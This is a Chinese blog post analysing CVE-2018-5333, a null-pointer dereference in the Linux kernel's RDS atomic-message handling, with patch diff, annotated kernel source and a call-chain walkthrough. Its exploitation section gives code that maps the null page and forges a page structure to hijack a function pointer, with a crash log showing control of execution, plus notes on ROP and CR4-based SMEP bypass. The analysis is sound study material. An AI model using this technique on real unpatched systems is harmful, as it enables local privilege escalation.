【kernel exploit】CVE-2018-5333 空指针引用漏洞

已于 2022-07-17 10:46:43 修改
阅读量1.3k 收藏 2
点赞数
分类专栏: 内核漏洞 漏洞 内核 文章标签: c# linux 开发语言
于 2021-07-27 20:48:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/panhewu9919/article/details/119153052
版权
内核漏洞 同时被 3 个专栏收录
38 篇文章 10 订阅
订阅专栏
漏洞
18 篇文章 0 订阅
订阅专栏
内核
18 篇文章 1 订阅
订阅专栏

文章目录

影响版本:Linux 4.14.14以前。 5.5分。4.14.13未修补,4.14.14已修补。

测试版本:Linux-4.14.13 exploit及测试环境下载地址—https://github.com/bsauce/kernel-exploit-factory

编译选项CONFIG_RDS=y CONFIG_DEBUG_INFO=y CONFIG_SLAB=y

General setup —> Choose SLAB allocator (SLUB (Unqueued Allocator)) —> SLAB

在编译时将.config中的CONFIG_E1000CONFIG_E1000E,变更为=y。参考

可以利用 CVE-2019-9213漏洞MMAP_MIN_ADDR 设置为0,也可以直接在编译时配置内核CONFIG_DEFAULT_MMAP_MIN_ADDR=0

$ wget https://mirrors.tuna.tsinghua.edu.cn/kernel/v4.x/linux-4.14.13.tar.xz
$ tar -xvf linux-4.14.13.tar.xz
# KASAN: 设置 make menuconfig 设置"Kernel hacking" ->"Memory Debugging" -> "KASan: runtime memory debugger"
$ make -j32
$ make all
$ make modules
# 编译出的bzImage目录:/arch/x86/boot/bzImage。

漏洞描述net/rds/rdma.c中的 rds_cmsg_atomic() 函数中忘记将rm->atomic.op_active置0,导致 rds_atomic_free_op() -> set_page_dirty() 引用page->page_link时发生 null-dereference 漏洞。

补丁patch

diff --git a/net/rds/rdma.c b/net/rds/rdma.c
index 94729d9da4372..634cfcb7bba68 100644
--- a/net/rds/rdma.c
+++ b/net/rds/rdma.c
@@ -877,6 +877,7 @@ int rds_cmsg_atomic(struct rds_sock *rs, struct rds_message *rm,
 err:
 	if (page)
 		put_page(page);
+	rm->atomic.op_active = 0;
 	kfree(rm->atomic.op_notifier);
 
 	return ret;

保护机制:开启SMEP,关闭KASLR/SMAP。

利用总结:利用空指针引用漏洞,在0地址伪造结构和函数指针,劫持控制流。

一、漏洞分析

RDS介绍:具体可查看Documentation/networking/rds.txt

漏洞触发流程SyS_sendmsg -> __sys_sendmsg -> ___sys_sendmsg -> sock_sendmsg -> selinux_socket_sendmsg sendmsg() -> rds_sendmsg() -> rds_cmsg_send() -> rds_cmsg_atomic()

崩溃流程rds_sendmsg() (从rds_cmsg_send()返回) -> rds_message_put() -> rds_message_purge() -> rds_atomic_free_op() -> set_page_dirty()

socket类型设置为pf_rds,即可通过sendmsg调用来触发rds_cmsg_send()

sendmsg调用参数

sendmsg(int socket, const struct msghdr *message, int flags);
// msghdr 结构
struct msghdr {
	void		*msg_name;	/* ptr to socket address structure */
	int		msg_namelen;	/* size of socket address structure */
	struct iov_iter	msg_iter;	/* data */
	void		*msg_control;	/* ancillary data */					// 可用来针对特定协议来传递数据,指向结构结构 struct cmsghdr,其长度为 msg_controllen
	__kernel_size_t	msg_controllen;	/* ancillary data buffer length */
	unsigned int	msg_flags;	/* flags on received message */
	struct kiocb	*msg_iocb;	/* ptr to iocb for async requests */
};
// cmsghdr 结构,其包含一个隐式字段 unsigned char cmsg_data[] 用来保存传递的数据,供特定的协议使用。
struct cmsghdr {
	__kernel_size_t	cmsg_len;	/* data byte count, including hdr */
        int		cmsg_level;	/* originating protocol */
        int		cmsg_type;	/* protocol-specific type */
};

调用流程分析

int rds_sendmsg(struct socket *sock, struct msghdr *msg, size_t payload_len)
{
    ... ...
    ret = rds_cmsg_send(rs, rm, msg, &allocated_mr);	// <--------------
    if (ret) {
		/* Trigger connection so that its ready for the next retry */
		if (ret ==  -EAGAIN)
			rds_conn_connect_if_down(conn);
		goto out;
	}
    ... ...
out:
	/* If the user included a RDMA_MAP cmsg, we allocated a MR on the fly.
	 * If the sendmsg goes through, we keep the MR. If it fails with EAGAIN
	 * or in any other way, we need to destroy the MR again */
	if (allocated_mr)
		rds_rdma_unuse(rs, rds_rdma_cookie_key(rm->m_rdma_cookie), 1);

	if (rm)
		rds_message_put(rm);							// <---------------
	return ret;
}

// (1) rds_cmsg_send() 
static int rds_cmsg_send(struct rds_sock *rs, struct rds_message *rm,
			 struct msghdr *msg, int *allocated_mr)
{
	struct cmsghdr *cmsg;
	int ret = 0;

	for_each_cmsghdr(cmsg, msg) {
		... ...
		case RDS_CMSG_ATOMIC_CSWP:
		case RDS_CMSG_ATOMIC_FADD:
		case RDS_CMSG_MASKED_ATOMIC_CSWP:
		case RDS_CMSG_MASKED_ATOMIC_FADD:
			ret = rds_cmsg_atomic(rs, rm, cmsg);		// <----------------
			break;
		... ...
}
// (2) rds_cmsg_atomic —— 设置atomic类型请求的rds_message结构
int rds_cmsg_atomic(struct rds_sock *rs, struct rds_message *rm,
		    struct cmsghdr *cmsg)
{
	struct page *page = NULL;
	struct rds_atomic_args *args;
	int ret = 0;

	if (cmsg->cmsg_len < CMSG_LEN(sizeof(struct rds_atomic_args))
	 || rm->atomic.op_active)
		return -EINVAL;

	args = CMSG_DATA(cmsg); 		// #define CMSG_DATA(cmsg)	((void *)((char *)(cmsg) + sizeof(struct cmsghdr)))				args指向cmsg中的 cmsg_data, 也即用户内存
	... ...
	rm->atomic.op_notify = !!(args->flags & RDS_RDMA_NOTIFY_ME);
	rm->atomic.op_silent = !!(args->flags & RDS_RDMA_SILENT);
	rm->atomic.op_active = 1;							// [1] 表示已初始化,可用状态
	rm->atomic.op_recverr = rs->rs_recverr;
	rm->atomic.op_sg = rds_message_alloc_sgs(rm, 1);	// [2] 获取rds_message后面的scatterlist,显然这些scatterlists都是初始化状态,并未分配真正的page
	if (!rm->atomic.op_sg) {
		ret = -ENOMEM;
		goto err;
	}

	/* verify 8 byte-aligned */
	if (args->local_addr & 0x7) {						// [3] 地址对齐
		ret = -EFAULT;
		goto err;
	}

	ret = rds_pin_pages(args->local_addr, 1, &page, 1); // [4] 获取用户page,再把scatterlist设置为这个page。
	if (ret != 1)
		goto err;
	ret = 0;

	sg_set_page(rm->atomic.op_sg, page, 8, offset_in_page(args->local_addr));

	if (rm->atomic.op_notify || rm->atomic.op_recverr) {
		/* We allocate an uninitialized notifier here, because
		 * we don't want to do that in the completion handler. We
		 * would have to use GFP_ATOMIC there, and don't want to deal
		 * with failed allocations.
		 */
		rm->atomic.op_notifier = kmalloc(sizeof(*rm->atomic.op_notifier), GFP_KERNEL);
		if (!rm->atomic.op_notifier) {
			ret = -ENOMEM;
			goto err;
		}

		rm->atomic.op_notifier->n_user_token = args->user_token;
		rm->atomic.op_notifier->n_status = RDS_RDMA_SUCCESS;
	}

	rm->atomic.op_rkey = rds_rdma_cookie_key(args->cookie);
	rm->atomic.op_remote_addr = args->remote_addr + rds_rdma_cookie_offset(args->cookie);

	return ret;
err:
	if (page)
		put_page(page);
	kfree(rm->atomic.op_notifier);						// [5] 出错以后释放掉了rm->atomic.op_notifier,整个rds_sendmsg也宣告结束,之后会释放掉rds_message这个结构。

	return ret;
}
// (3) rds_message_put() 
void rds_message_put(struct rds_message *rm)
{
	rdsdebug("put rm %p ref %d\n", rm, refcount_read(&rm->m_refcount));
	WARN(!refcount_read(&rm->m_refcount), "danger refcount zero on %p\n", rm);
	if (refcount_dec_and_test(&rm->m_refcount)) {
		BUG_ON(!list_empty(&rm->m_sock_item));
		BUG_ON(!list_empty(&rm->m_conn_item));
		rds_message_purge(rm);							// <---------------

		kfree(rm);
	}
}
EXPORT_SYMBOL_GPL(rds_message_put);
// (4) rds_message_purge() —— 如果进入先前两个错误处理任意其中一个,返回的时候,并没有指定 rm->atomic.op_active=0,所以这里会进入rds_atomic_free_op
static void rds_message_purge(struct rds_message *rm)
{
	unsigned long i, flags;
	bool zcopy = false;
	...
	if (rm->rdma.op_active)
		rds_rdma_free_op(&rm->rdma);
	if (rm->rdma.op_rdma_mr)
		rds_mr_put(rm->rdma.op_rdma_mr);

	if (rm->atomic.op_active)
		rds_atomic_free_op(&rm->atomic);			// <--------------- 
	if (rm->atomic.op_rdma_mr)
		rds_mr_put(rm->atomic.op_rdma_mr);
}
// (5) rds_atomic_free_op()
void rds_atomic_free_op(struct rm_atomic_op *ao)
{
	struct page *page = sg_page(ao->op_sg);			// <----------------

	/* Mark page dirty if it was possibly modified, which
	 * is the case for a RDMA_READ which copies from remote
	 * to local memory */
	set_page_dirty(page);
	put_page(page);

	kfree(ao->op_notifier);
	ao->op_notifier = NULL;
	ao->op_active = 0;
}
// (6) sg_page() —— 漏洞触发点,出错前没有设置对应 scatterlist 的 page。scatterlist结构page_link的0bit 和 1bit位置上是标志sg_chain和sg_end的flag,所以这里是4对齐。显然初始化状态下的page_link等于0.所以后面在操作page结构的时候,就产生了null pointer dereference。所以这里修复也很简单,只需要在上面错误返回的时候,设置一下rm->atomic.op_active=0, 就可以避免执行 rds_atomic_free_op() 函数。
static inline struct page *sg_page(struct scatterlist *sg)
{
	return (struct page *)((sg)->page_link & ~(SG_CHAIN | SG_END));
}

(2) -> [2] scatterlist 结构的创建

// rds_message_alloc() —— 分配 rds_message 结构时设置 scatterlist 物理内存的散列表,主要是供DMA使用
struct rds_message *rds_message_alloc(unsigned int extra_len, gfp_t gfp)
{
	struct rds_message *rm;

	if (extra_len > KMALLOC_MAX_SIZE - sizeof(struct rds_message))
		return NULL;

	rm = kzalloc(sizeof(struct rds_message) + extra_len, gfp);	// extra_len就是scatterlists的大小
	if (!rm)
		goto out;

	rm->m_used_sgs = 0;
	rm->m_total_sgs = extra_len / sizeof(struct scatterlist);
	...
out:
	return rm;
}
// rds_rm_size() —— 这里可以看到 extra_len 是怎么计算的
static int rds_rm_size(struct msghdr *msg, int num_sgs,
		       struct rds_iov_vector_arr *vct)
{
	...
	switch (cmsg->cmsg_type) {
		case RDS_CMSG_ATOMIC_CSWP:
		case RDS_CMSG_ATOMIC_FADD:
		case RDS_CMSG_MASKED_ATOMIC_CSWP:
		case RDS_CMSG_MASKED_ATOMIC_FADD:
			cmsg_groups |= 1;
			size += sizeof(struct scatterlist);
			break;
	...
	size += num_sgs * sizeof(struct scatterlist);

二、漏洞利用

思路:伪造page结构,劫持page结构上的函数指针。

函数指针引用流程rds_sendmsg() (从rds_cmsg_send()返回) -> rds_message_put() -> rds_message_purge() -> rds_atomic_free_op() -> set_page_dirty() page_mapping()

// (4) rds_atomic_free_op()
void rds_atomic_free_op(struct rm_atomic_op *ao)
{
	struct page *page = sg_page(ao->op_sg);

	/* Mark page dirty if it was possibly modified, which
	 * is the case for a RDMA_READ which copies from remote
	 * to local memory */
	set_page_dirty(page);
	put_page(page);

	kfree(ao->op_notifier);
	ao->op_notifier = NULL;
	ao->op_active = 0;
}
// (5) set_page_dirty()
int set_page_dirty(struct page *page)
{
	struct address_space *mapping = page_mapping(page);					// <--------------

	page = compound_head(page);
	if (likely(mapping)) {
		int (*spd)(struct page *) = mapping->a_ops->set_page_dirty;		// 发生函数引用,只要mapping来自page,即可劫持控制流。		利用技巧:可充分利用0地址,将 a_ops 设置为0,mapping 不能设置为0,详细情况如下。
		... ...
		return (*spd)(page);
	}
	if (!PageDirty(page)) {
		if (!TestSetPageDirty(page))
			return 1;
	}
	return 0;
}
EXPORT_SYMBOL(set_page_dirty);
// (6) page_mapping() —— mapping 如何从page中取出
struct address_space *page_mapping(struct page *page)
{
	struct address_space *mapping;

	page = compound_head(page);											// [1] 可以通过page->compound_head改变page的指向,可能有用。
	/* This happens if someone calls flush_dcache_page on slab page */
	if (unlikely(PageSlab(page)))
		return NULL;

	if (unlikely(PageSwapCache(page))) {								// [2] 避免进入此逻辑,这是通过比较 page->flagsbit 位来判断,所以这里只需要把 page->flags 置零就行。
		swp_entry_t entry;

		entry.val = page_private(page);
		return swap_address_space(entry);
	}

	mapping = page->mapping;
	if ((unsigned long)mapping & PAGE_MAPPING_ANON)						// [3] 通过对齐后返回mapping		
		return NULL;

	return (void *)((unsigned long)mapping & ~PAGE_MAPPING_FLAGS);
}
EXPORT_SYMBOL(page_mapping);
// compound_head()
static inline struct page *compound_head(struct page *page)
{
	unsigned long head = READ_ONCE(page->compound_head);

	if (unlikely(head & 1))
		return (struct page *) (head - 1);
	return page;
}

伪造page结构:将(5)中的int (*spd)(struct page *) = mapping->a_ops->set_page_dirty;。可充分利用0地址,将 a_ops 设置为0,mapping 不能设置为0。当 pagea_ops都设置为0时,需要解决一个冲突。

page->mapping  == ((char *)page)+0x18
a_pos->set_page_dirty == ((char *)a_pos)+0x18
// 所以这里最好是通过compound_head(head),改变一下page,把paga指到其他用户空间上,例如栈上
	char str[1000];
	map_null_address();
	unsigned long *data = (unsigned long *)0;
	memset(str,0,1000);
	*((unsigned long *)(str+0x18)) = str;
	data[1] = str+1;
	data[3] = 0xffffffffdeadbeaf;
	trigger_null_pointer_ref();
// 报错,说明成功了
[ 2515.888056] BUG: unable to handle kernel paging request at ffffffffdeadbeaf

利用:利用xchg切换到用户态,执行ROP;也可以写CR4绕过SMEP。

请添加图片描述

参考

https://nvd.nist.gov/vuln/detail/CVE-2018-5333

CVE-2019-9213 && CVE-2018-5333组合提权

CVE-2018-5333

泄露地址 CVE-2017-16994 —— patch blog exp

bsauce
关注
专栏目录
【权限提升】Linux Kernel ebpf 提权漏洞(CVE-2022-23222)
做自己喜欢的事,并将其发挥到极致!
10-09 2657
CVE-2022-23222 Linux Kernel ebpf权限提升漏洞
CVE-2022-0847 Linux脏管道漏洞分析
最新发布
qq_42735101的博客
01-26 981
CVE-2022-0847漏洞被一名叫Max Kellermann的安全研究员于2022年3月7日公开披露,并将该漏洞命名为The Dirty Pipe Vulnerability(脏管道漏洞)。
【翻译】 Windows 内核漏洞学习—空指针引用
dfdhxb995397的博客
08-08 218
Windows Kernel Exploitation – NullPointer Dereference 原文地址:https://osandamalith.com/2017/06/22/windows-kernel-exploitation-null-pointer-dereference/ 本文由prison翻译整理,首发i春秋 引言:Windows内核漏洞的利用和...
通过对比 5 月补丁分析 win32k 空指针引用漏洞
qq_44005305的博客
02-11 239
这篇文章通过补丁对比的方式发现并分析 5 月补丁修复的一个在 win32k 内核模块中存在的空指针引用导致的内核提权漏洞。根据 FortiGuard Labs 发布的信息,该漏洞正是 5 月补丁中修复的 CVE-2018-8120 漏洞漏洞存在于内核函数 SetImeInfoEx 中,在未对目标窗口站 tagWINDOWSTATION 对象的指针成员域 spklList 指向地址进行有效性校验的情况下,函数对该地址直接进行读取访问。
kernel exploitCVE-2019-8956 sctp_sendmsg()空指针引用漏洞
panhewu9919的博客
07-07 1245
kernel exploitCVE-2019-8956 sctp_sendmsg()空指针引用漏洞 影响版本:Linux-4.20.8以前(v4.20.8已修补) 4.19.21以前 7.8分。 测试版本:Linux-4.20.7 exploit及测试环境下载地址—https://github.com/bsauce/kernel-exploit-factory 编译选项: CONFIG_IP_SCTP=y CONFIG_SLAB=y General setup —> Choose SLA
java空指针漏洞利用_源码审计之空指针引用漏洞
weixin_39613291的博客
02-24 836
*本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担。*本文原创作者:freezing,本文属FreeBuf原创奖励计划,未经许可禁止转载前言最近在网上加入了一个安全团队,里面有人问我如何做代码审计。只能说先能看得懂代码,了解各种漏洞的形成原因。然后多进行审计和调试练习。 这是刚学习源码审计时写的一遍审核过程, 希望大家做个参考。(ph...
HEVD3.0-第五部分-空指针引用
qq_36918532的博客
03-07 412
前言 本篇有上一小节的知识就很简单了,因为也需要用到申请NULL页面 当指针为NULL时,存在空指针引用漏洞,并被程序指向有效的内存区域,所以只要能控制NULL页面,然后在该地方申请内存,将shellcode放进去就行了 分析 用IDA打开HEVD.sys文件进行分析 然后打印一些东西 判断值是否等于0xBAD0B0B0 相等就进行打印和赋值的一些操作 漏洞点在第二个红框,在指针清空了之后,如果走了这个分支之后没有判断就直接调用了,这里面注意EDI的值为0也就是,call ds:[4],将这个位置放
IE UAF 漏洞CVE-2012-4969)漏洞分析与利用
giantbranch的专栏
04-05 5307
简介 这是一个UAF的漏洞 实验环境 Windows 7 Sp1 32位 IE 8 windbg IDA mona 漏洞分析 搜了一下metasploit那里有,于是就直接生成exp咯 msf > search CVE-2012-4969 Matching Modules ================ Name
CVE-2022-23222 漏洞复现
qq_43472789的博客
06-09 726
2022年1月14日,一个编号为CVE-2022-23222的漏洞被公开,这是一个位于eBPF验证器中的漏洞漏洞允许eBPF程序在未经验证的情况下对特定指针进行运算,通过精心构造的代码,可以实现任意内核内存读写,而这将会造成本地提权的风险。由于内核在执行用户提供的 eBPF 程序前缺乏适当的验证,攻击者可以利用这个漏洞获取 root 权限。该漏洞是由于 Linux 内核的 eBPF 验证器存在一个空指针漏洞,没有对*_OR_NULL指针类型进行限制,允许这些类型进行指针运算。
对 UAF 漏洞 CVE-2015-2546 的分析和利用
javagty6778的博客
03-19 279
这篇文章分析了发生在窗口管理器(User)子系统的菜单管理组件中的 CVE-2015-2546 UAF(释放后重用)漏洞。在内核函数调用向目标菜单窗口对象发送消息期间,执行流存在发生用户回调的可能性;在发送消息的函数调用返回后,函数没有重新获取目标菜单窗口对象所关联的弹出菜单对象的地址,而直接使用在发送消息之前就存储在寄存器ebx中的弹出菜单对象地址,将该对象地址作为参数传递给函数调用,并在该函数中对目标弹出菜单对象进行访问。
c语言指针漏洞,C语言_指针随笔 - 风哲的个人空间 - OSCHINA - 中文开源技术交流社区...
weixin_39547158的博客
05-19 90
指针:指针就是地址,地址就是指针。地址就是内存单元的编号。指针变量是存放地址的变量(例:int* p,这里的p就是指针变量,用于存放地址)指针和指针变量是两个不同的概念:平时也把指针变量间读为指针,也就是说下面示例代码中的p既是我们所说的指针,也是我们所说的指针变量。例:指针里面存放的是100:这句话中,指针就是地址指针里面存放的是地址:这句话中,指针就是指针变量为什么使用指针:指针能直接访问硬件...
ciscn_2019_ne_6(指针未初始化漏洞)
seaaseesa的博客
06-11 585
ciscn_2019_ne_6(指针未初始化漏洞) 首先,检查一下程序的保护机制 然后,我们用IDA分析一下,在delete功能里,ptr指针存在未初始化的漏洞,因此其ptr的值可以通过其他函数来控制,造成任意地址free。 我们可以利用check函数来控制ptr未初始化之前的值 然后构造double free,劫持free_hook即可。 #coding:utf8 from pwn import * #sh = process('./ciscn_2019_ne_6') sh =
空指针漏洞防护技术-初级篇
嬴政
08-05 4075
源文地址:http://www.panshy.com/articles/201508/security-2509.html 空指针漏洞防护技术 安全历史上由于空指针所带来的漏洞及攻击数不胜数,但由于其对利用者的编程能力有要求,对分析及防护者来说有更高的要求,所以国内对空指针漏洞及相关技术的讨论不是很多。今天这篇《空指针漏洞防护技术》,由绿盟科技威胁响应安全专家坐堂讲解,大家可以从中了解空指
kernel exploitCVE-2019-9213 逻辑漏洞绕过 mmap_min_addr 限制
panhewu9919的博客
07-07 1299
影响版本:Linux-4.20.14以前(v4.20.14已修补) 5.5分。 测试版本:Linux-4.20.7 exploit及测试环境下载地址—https://github.com/bsauce/kernel-exploit-factory 编译选项: CONFIG_SLAB=y General setup —> Choose SLAB allocator (SLUB (Unqueued Allocator)) —> SLAB 在编译时将.config中的CONFIG_E1000和
DVR登录绕过漏洞复现(CVE-2018-9995)
StriveBen的博客
05-11 5163
DVR登录绕过(CVE-2018-9995) 欢迎进群交流技术: 363034250 前言 前两天关于DVR登录绕过的漏洞文章就有了,最近看到了它的POC,是阿根廷一个叫费尔南德斯的大牛在4.30更新在其博客上的,直接能够获取多种DVR的明文凭证(登录密码),于是我也尝试了一下,屡试不爽… 漏洞复现 感觉问题在,这些DVR的cookie都好简单,”uid=admin”,然后凭证都是明文…...
黑客正在利用 TBK DVR 设备中五年未修复的 0day
smellycat000的专栏
05-04 717
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士FortiGuard Labs 发布安全公告指出,威胁行动者们正在利用影响 TBK 数字化视频记录 (DVR) 设备的一个未修复漏洞 (CVE-2018-9995)。该漏洞已存在五年之久。CVE-2018-9995的CVSS 评分为9.8,是一个认证绕过漏洞,可被远程攻击者用于提升权限。Fortinet 在5月1日发布的文章中剃刀,“该已存在五年...
CVE-2018-9995--攻击网络硬盘录像机(DVR)
mouseleoz的博客
05-05 3788
漏洞编号:CVE-2018-9995发现时间:2018-4影响范围:tbk、NovoCeNova、QSee、Pulnix、XVR 5 in 1、Securus、Night OWL漏洞描述:   DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机,相对于传统的模拟摄像录像机,采用硬盘录像,故常常被称为硬盘录像机,也被称为DVR。它是一套进行图像计算存储处理的计...
Linux 安全缓解机制总结
小吕的博客
09-12 1830
Linux 安全缓解机制总结_panhewu9919的博客-CSDN博客 学习资料: kernel-security-learning linux-kernel-defence-map A Decade of Linux Kernel Vulnerabilities, their Mitigation and Open Problems-2017 The State of Kernel Self Protection-2018 PaX/Grsecurity...
Linux进程的管理与调度(七)--- Linux下1号进程的前世(kernel_init)今生(init进程)
|~~~热爱生活、努力学习的小伙汁~~~|
12-01 520
Linux进程的管理与调度(六)--- Linux下1号进程的前世(kernel_init)今生(init进程)init 进程 - 1号进程kernel_initinit 进程关于 init 程序附录kernel_init_freeable流程分析kernel_init分析 Linux 下有3 个特殊的进程,idle进程(PID=0)(PID = 0)(PID=0),init进程(PID=1)(PID = 1)(PID=1) 和 kthreadd进程(PID=2)(PID = 2)(PID=2)。 i
CVE-2018-15473复测
07-28
根据引用\[1\]和引用\[2\]的内容,CVE-2018-15473是一个存在于WebLogic服务器中的漏洞。你可以使用引用\[2\]中提供的命令来进行复测。首先,你需要下载相应的jar文件,然后使用提供的exploit.py脚本进行测试。在命令中,你需要替换以下参数: - \[victim ip\]:被攻击的WebLogic服务器的IP地址 - \[victim port\]:WebLogic服务器的端口号 - \[path to ysoserial\]:ysoserial的路径 - \[JRMPListener ip\]:JRMPListener的IP地址 - \[JRMPListener port\]:JRMPListener的端口号 请确保你已经在测试环境中进行操作,并且遵循适当的安全措施。 #### 引用[.reference_title] - *1* *2* [Weblogic CVE-2018-3191远程代码命令执行漏洞复现](https://blog.csdn.net/m0_64910183/article/details/126613249)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [[web攻防] weblogic 漏洞复现 CVE-2017-10271&CVE-2018-2628&CVE-2018-2894](https://blog.csdn.net/AAAAAAAAAAAA66/article/details/124083668)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值